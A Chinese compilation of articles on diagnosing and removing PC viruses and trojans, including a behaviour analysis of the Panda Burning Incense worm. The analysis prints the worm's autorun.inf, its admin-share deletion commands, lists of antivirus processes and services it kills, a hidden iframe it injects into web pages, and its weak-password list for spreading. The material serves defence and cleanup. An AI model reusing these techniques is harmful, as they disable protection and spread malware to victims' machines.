如何清除电脑病毒


计算机考试 2019-10-20 12:15:10 计算机考试
[摘要]如何清除电脑病毒(共5篇)如何预防及清除计算机病毒浅谈如何预防及清除计算机病毒摘 要:现如今,计算机已经深入到每个国民的生活和工作中,对工作的效率和生活的品质有着很大的影响。在计算机不断普及的过程中,病毒却无形地侵入到计算机内

【www.shanpow.com--计算机考试】

【一】:如何预防及清除计算机病毒

浅谈如何预防及清除计算机病毒

摘 要:现如今,计算机已经深入到每个国民的生活和工作中,对工作的效率和生活的品质有着很大的影响。在计算机不断普及的过程中,病毒却无形地侵入到计算机内部,把整个社会的发展节奏打乱了。计算机病毒的出现,使得每个人都十分担心自己的电脑成为被入侵的目标。

关键词:计算机病毒;现状;措施

计算机病毒的清除和预防方面的参考书籍很多,不懂病毒原理的人不能够透彻理解其中的内容,而懂得病毒原理的人选择的是自身的经验。因此,明确的预防及清除的方法一直没有形成。以下简单分析预防和清除计算机病毒的方法。

一、病毒侵入计算机时的现状

对于计算机是否感染病毒,可以从许多显著的现象中观察

到。例如:数据无故消失、打印机出现异常、突然自动地重新启动、运行中的程序总是死机、搜寻不到硬盘的分区位置、文件不能正常地储存、不能正常开机、频繁地出现不正常的信息、文件偶然呈现被修改的迹象、不能升级杀毒软件、不能登录网页、磁盘的空间被占用以及运行速度减慢等等。这些现象的出现,都说明有可能有病毒侵入该计算机了。

二、关于计算机病毒

所谓计算机病毒,就是在最大限度上将拟定的破坏性数据或者功能插入到计算机当中,很多情况下会马上让计算机减缓使用速度,

【二】:如何全面清除计算机病毒

灭毒有招 如何全面清除计算机病毒(防毒技巧)

网络时代,病毒已经无所不在。在层出不穷、变化多端的病毒袭击下,中招基本上是不可避免的了。那么中招以后我们改如何处理(当然必须处理,否则计算机没法替你工作)?是格式化系统然后重装Windows,还是请人帮忙……。因为职业关系,我不得不与这些让人讨厌的东西战斗着,逐步地积累了一些行之有效的办法,供大家参考。

一、中毒的一些表现

我们怎样知道电脑中病毒了呢?其实电脑中毒跟人生病一样,总会有一些明显的症状表现出来。例如机器运行十分缓慢、上不了网、杀毒软件生不了级、word文档打不开,电脑不能正常启动、硬盘分区找不到了、数据丢失等等,就是中毒的一些征兆。

二、中毒诊断

1、按Ctrl+Shift+Ese键(同时按此三键),调出windows任务管理器查看系统运行的进程,找出不熟悉进程并记下其名称(这需要经验),如果这些进程是病毒的话,以便于后面的清除。暂时不要结束这些进程,因为有的病毒或非法的进程可能在此没法结束。点击性能查看CPU和内存的当前状态,如果CPU的利用率接近100%或内存的占用值居高不下,此时电脑中毒的可能性是95%。

2、查看windows当前启动的服务项,由“控制面板”的“管理工具”里打开“服务”。看右栏状态为“启动”启动类别为“自动”项的行;一般而言,正常的windows服务,基本上是有描述内容的(少数被骇客或蠕虫病毒伪造的除外),此时双击打开认为有问题的服务项查看其属性里的可执行文件的路径和名称,假如其名称和路径为C:\winnt\system32\explored.exe,计算机中招。有一种情况是“控制面板”打不开或者是所有里面的图标跑到左边,中间有一纵向的滚动条,而右边为空白,再双击添加/删除程序或管理工具,窗体内是空的,这是病毒文件winhlpp32.exe发作的特性。

3、运行注册表编辑器,命令为regedit或regedt32,查看都有那些程序与windows一起启动。主要看Hkey_Local_Machine\Software\MicroSoft\Windows\CurrentVersion\Run和后面几个RunOnce等,查看窗体右侧的项值,看是否有非法的启动项。WindowsXp运行msconfig也起相同的作用。随着经验的积累,你可以轻易的判断病毒的启动项。

4、用浏览器上网判断。前一阵发作的Gaobot病毒,可以上yahoo.com,sony.com等网站,但是不能访问诸如,这样著名的安全厂商的网站,安装了symantecNorton2004的杀毒软件不能上网升级。

5、取消隐藏属性,查看系统文件夹winnt(windows)\system32,如果打开后文件夹为空,表明电脑已经中毒;打开system32后,可以对图标按类型排序,看有没有流行病毒的执行文件存在。顺便查一下文件夹Tasks,wins,drivers.目前有的病毒执行文件就藏身于此;

drivers\etc下的文件hosts是病毒喜欢篡改的对象,它本来只有700字节左右,被篡改后就成了1Kb以上,这是造成一般网站能访问而安全厂商网站不能访问、著名杀毒软件不能升级的原因所在。www.shanpow.com_如何清除电脑病毒。

6、由杀毒软件判断是否中毒,如果中毒,杀毒软件会被病毒程序自动终止,并且手动升级失败。

三、灭毒www.shanpow.com_如何清除电脑病毒。

1、在注册表里删除随系统启动的非法程序,然后在注册表中搜索所有该键值,删除之。当成系统服务启动的病毒程序,会在Hkey_Local_Machine\System\ControlSet001\services和controlset002\services里藏身,找到之后一并消灭。

2、停止有问题的服务,改自动为禁止。

3、如果文件system32\drivers\etc\hosts被篡改,恢复它,即只剩下一行有效值

“127.0.0.1localhost”,其余的行删除。再把host设置成只读。

4、重启电脑,摁F8进“带网络的安全模式”。目的是不让病毒程序启动,又可以对Windows升级打补丁和对杀毒软件升级。

5、搜索病毒的执行文件,手动消灭之。

6、对Windows升级打补丁和对杀毒软件升级。

7、关闭不必要的系统服务,如remoteregistryservice。

8、第6步完成后用杀毒软件对系统进行全面的扫描,剿灭漏网之鱼。

9、上步完成后,重启计算机,完成所有操作。

四、建议

防范病毒作用远甚于查杀病毒。因此建立严密的防范措施是十分必要的。在具备条件的大中型网络里,应该软硬兼施、立体防护。理想得到情况是:Internet的接入处是外网防火墙;紧接着是防毒网关(熊猫卫士的性价比较高);然后是路由器,服务器区,可为应用服务器配置一台病毒服务器;再往内是内网防火墙;内网架设杀毒服务器,每个用户都安装杀毒软件的可管理客户端。

怎样预防熊猫烧香系列病毒?

最近那个熊猫烧香病毒让所有用电脑的人很生气,熊猫这个国宝似乎不再可爱,而成了人人喊打的过街老鼠。熊猫变种实在太多,中招后的损失很严重,杀毒软件一直在救火中。以下几招很简单易行,帮你预防熊猫烧香病毒,至少能明显减少你中招的几率。

1.立即检查本机administrator组成员口令,一定放弃简单口令甚至空口令,安全的口令是字母数字特殊字符的组合,自己记得住,别让病毒猜到就行。修改方法,右键单击我的电脑,选择管理,浏览到本地用户和组,在右边的窗格中,选择具备管理员权限的用户名,单击右键,选择设置密码,输入新密码就行。

2.利用组策略,关闭所有驱动器的自动播放功能。

步骤:单击开始,运行,输入gpedit.msc,打开组策略编辑器,浏览到计算机配置,管理模板,系统,在右边的窗格中选择关闭自动播放,该配置缺省是未配置,在下拉框中选择所有驱动器,再选取已启用,确定后关闭。最后,在开始,运行中输入gpupdate,确定后,该策略就生效了。

3.修改文件夹选项,以查看不明文件的真实属性,避免无意双击骗子程序中毒。 步骤:打开资源管理器(按windows徽标键+E),点工具菜单下文件夹选项,再点查看,在高级设置中,选择查看所有文件,取消隐藏受保护的操作系统文件,取消隐藏文件扩展名。

4.时刻保持操作系统获得最新的安全更新,建议用杀毒软件的漏洞扫描功能。

5.启用windows防火墙保护本地计算机。

熊猫烧香病毒专杀及手动修复方案

本文介绍了熊猫烧香病毒、熊猫烧香病毒变种的查杀方法,及熊猫烧香病毒的手动清除方案。提供了病毒进程为spoclsv.exe和FuckJacks.exe变种的解决方案,和熊猫烧香病毒专杀工具。

在动手查杀熊猫烧香病毒之前,强烈建议先注意以下四点:

1.本文包含两种熊猫烧香病毒变种的描述,请注意查看病毒症状,根据实际情况选用不同的查杀方法。

2.对于被熊猫烧香病毒感染的.exe可执行文件,推荐先备份,再修复!

3.找回被熊猫烧香病毒删除的ghost(.gho)文件,详情请见文中!

4.对计算机了解不多的用户,请在专家指导下清除熊猫烧香病毒。

熊猫烧香病毒变种一:病毒进程为“spoclsv.exe”

这是“熊猫烧香”早期变种之一,特别之处是“杀死杀毒软件”,最恶劣之处在于感染全盘.exe文件和删除.gho文件(Ghost的镜像文件)。

最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码,且一定要清除。否则访问了有此代码的网页,又会感染。

其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。就不再单独列出。 病毒描述:

“武汉男生”,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,(.gho为GHOST的备份文件),使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

以下是熊猫烧香病毒详细行为和解决办法:

熊猫烧香病毒详细行为:

1.复制自身到系统目录下:

www.shanpow.com_如何清除电脑病毒。

%System%\drivers\spoclsv.exe(“%System%”代表Windows所在目录,比如:

C:\Windows)

不同的spoclsv.exe变种,此目录可不同。比如12月爆发的变种目录是:C:\WINDOWS\System32\Drivers\spoclsv.exe。

2.创建启动项:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "svcshare"="%System%\drivers\spoclsv.exe"

3.在各分区根目录生成病毒副本:

X:\setup.exe

X:\autorun.inf

autorun.inf内容:

[AutoRun]

OPEN=setup.exe

shellexecute=setup.exe

shell\Auto\command=setup.exe

4.使用net share命令关闭管理共享:

cmd.exe /c net share X$ /del /y

cmd.exe /c net share admin$ /del /y

5.修改“显示所有文件和文件夹”设置:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion \Explorer\Advanced\Folder\Hidden\SHOWALL]

"CheckedValue"=dword:00000000

6.熊猫烧香病毒尝试关闭安全软件相关窗口:

天网

防火墙

进程

VirusScan

NOD32

网镖

杀毒

毒霸

瑞星

江民

黄山IE

超级兔子

优化大师

木马清道夫

木馬清道夫

QQ病毒

注册表编辑器

系统配置实用程序

卡巴斯基反病毒

Symantec AntiVirus

Duba

Windows 任务管理器

esteem procs

绿鹰PC

密码防盗

噬菌体

木马辅助查找器

System Safety Monitor

Wrapped gift Killer

Winsock Expert

游戏木马检测大师

超级巡警 msctls_statusbar32 pjf(ustc) IceSword 7.尝试结束安全软件相关进程以及Viking病毒(威金病毒)进程: Mcshield.exe VsTskMgr.exe naPrdMgr.exe UpdaterUI.exe TBMon.exe scan32.exe Ravmond.exe CCenter.exe RavTask.exe Rav.exe Ravmon.exe RavmonD.exe RavStub.exe KVXP.kxp KvMonXP.kxp KVCenter.kxp KVSrvXP.exe KRegEx.exe UIHost.exe TrojDie.kxp FrogAgent.exe Logo1_.exe Logo_1.exe Rundl132.exe 8.禁用安全软件相关服务: Schedule sharedaccess RsCCenter RsRavMon KVWSC KVSrvXP kavsvc AVP McAfeeFramework McShield McTaskManager navapsvc wscsvc KPfwSvc SNDSrvc ccProxy ccEvtMgr ccSetMgr SPBBCSvc Symantec Core LC NPFMntor MskService FireSvc 9.删除安全软件相关启动项: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

www.shanpow.com_如何清除电脑病毒。

10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息: <iframe src="hxxp:///wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>

但不修改以下目录中的网页文件:

C:\WINDOWS

C:\WINNT

C:\system32

C:\Documents and Settings

C:\System Volume Information

C:\Recycled

Program Files\Windows NT

Program Files\WindowsUpdate

Program Files\Windows Media Player

Program Files\Outlook Express

Program Files\Internet Explorer

Program Files\NetMeeting

Program Files\Common Fileswww.shanpow.com_如何清除电脑病毒。

Program Files\ComPlus Applications

Program Files\Messenger

Program Files\InstallShield Installation Information

Program Files\MSN

Program Files\Microsoft Frontpage

Program Files\Movie Maker

Program Files\MSN Gamin Zone

11.在访问过的目录下生成Desktop_.ini文件,内容为当前日期。

12.此外,病毒还会尝试删除GHO文件。

病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中:

password

harley

golf

pussy

mustang

shadow

fish

qwerty

baseball

letmein

ccc

admin

abc

pass

passwd

database

abcd

abc123

sybase

123qwe

server

computer

【三】:怎么手工清除电脑木马

  不知道中的是什么木马、无登陆的密码、找不到其相应的客户端程序、......,那我们就手工慢慢来删除这该死的木马吧!下面由小编给你做出详细的介绍!希望对你有帮助!

  手工删除木马:

  用msconfig打开系统配置实用程序,对win.ini、system.ini和启动项目进行编辑。屏蔽掉非法启动项。如在win.ini文件中,将将[WINDOWS]下面的“run=xxx”或“load=xxx”更改为“run=”和“load=”;编辑system.ini文件,将 [BOOT]下面的“shell=xxx”,更改为:“shell=Explorer.exe”。

  转贴于 华夏黑客同盟 用regedit打开注册表编辑器,对注册表进行编辑。先由上面的方法找到木马的程序名,再在整个注册表中搜索,并删除所有木马项目。由查找到的木马程序注册项,分析木马文件在硬盘中的位置(多在C:\WINDOWS和C:\WINDOWS\COMMAND目录下)。启动到纯MS-DOS状态(而不是在Windows环境中开个MS-DOS窗口),用del命令将木马文件删除。如果木马文件是系统、隐藏或只读文件,还得通过“attrib -s -h -r”将对应文件的属性改变,才可以删除。

  为保险起见,重新启动以后再由上面各种检测木马的方法对系统进行检查,以确保木马的确被删除了。

  目前也有一些木马是将自身的程序与Windows的系统程序进行了绑定(也就是感染了系统文件)。比如常用到的Explorer.exe,只要 Explorer.exe一得到运行,木马也就启动了。这种木马可以感染可执行文件,那就更象病毒了。由手工删除文件的方法处理木马后,一运行 Explorer.exe,木马又得以复生!这时要删除木马就得连Explorer.exe文件也给删除掉,再从别人相同操作系统版本的计算机中将该文件 Copy过来就可以了。

  结束语:

  Internet上每天都有新的木马冒出来,所采取的隐蔽措施也是五花八门。在信息社会里,计算机用户对自己的资料进行保密、防止泄漏也变得越来越重要。防范木马袭击也只是提高计算机安全性的一个方面。技术的发展,本文所讲述的检测、删除木马方法也总有一天会失效,最主要还是要靠用户提高警惕,防范所有的不安全事件于未然。

  典型案例一:

  我的机器已中了木马病毒Trojan.TRC.mIRC.f

  是在c:\WINNT\system32\sy5tem文件中,我想要把文件删掉,可是提示为:源文件正在被使用,瑞星杀毒软件又不能杀掉,我的系统是win2oooprofessinal,并不能运行msconfig命令,请教:该怎么办?

  回复:

  从Windows XP中剥离的Msconfig程序完全可以在Windows 2000中使用。顺便提供 pchome下载点。

  把它COPY 到Win2000的WinntSystem目录下,然后直接运行。

  程序首先会弹出一个出错的消息框,提示找不到以下几个系统文件:Config.sys、Autoexec.bat、System.ini 及Win.ini,“忽略”它,点击“确定”之后就会看到 Msconfig 程序窗口。

看了此文怎么手工清除电脑木马的人还看了:

1.怎么清除电脑中的木马

2.怎么手工查杀木马

www.shanpow.com_如何清除电脑病毒。 3.电脑中了木马后应该怎么做以及解决方法

4.怎么清理常见的木马

5.如何快速清理木马病毒

【四】:电脑中了木马后应该怎么做以及解决方法

  今天小编听说了一个网友的一个亲身经历的事情分享给大家:他在网站下载SEO软件,突然发现电脑中了木马被远程控制了。鼠标自己点些东西。他问小编应该怎么处理才没后顾之忧。他现在把网线拔掉了,鼠标就不乱点东西了。请问怎么查杀干净?360杀毒软件杀出没毒,但是360安全卫士又查杀出木马了,好像中了猎鹰远控木马。那么小编就针对这个问题介绍一个解决方法给他~大家也一起看看吧!!!

本文来源:https://www.shanpow.com/xx/110683/

《如何清除电脑病毒.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

相关阅读
  • 计算机考试答案 计算机考试答案
  • 大学生计算机考试答案【二篇】 大学生计算机考试答案【二篇】
  • 计算机考试时间规律是什么锦集三篇 计算机考试时间规律是什么锦集三篇
  • 大学生计算机考试答案(通用2篇) 大学生计算机考试答案(通用2篇)
  • 大学生计算机考试答案范文汇总二篇 大学生计算机考试答案范文汇总二篇
  • 计算机考试技巧与方法有哪些(锦集5篇) 计算机考试技巧与方法有哪些(锦集5篇)
  • 2023计算机考试一级怎么备考精选2篇 2023计算机考试一级怎么备考精选2篇
  • 计算机考试过关技巧攻略精选三篇 计算机考试过关技巧攻略精选三篇
为您推荐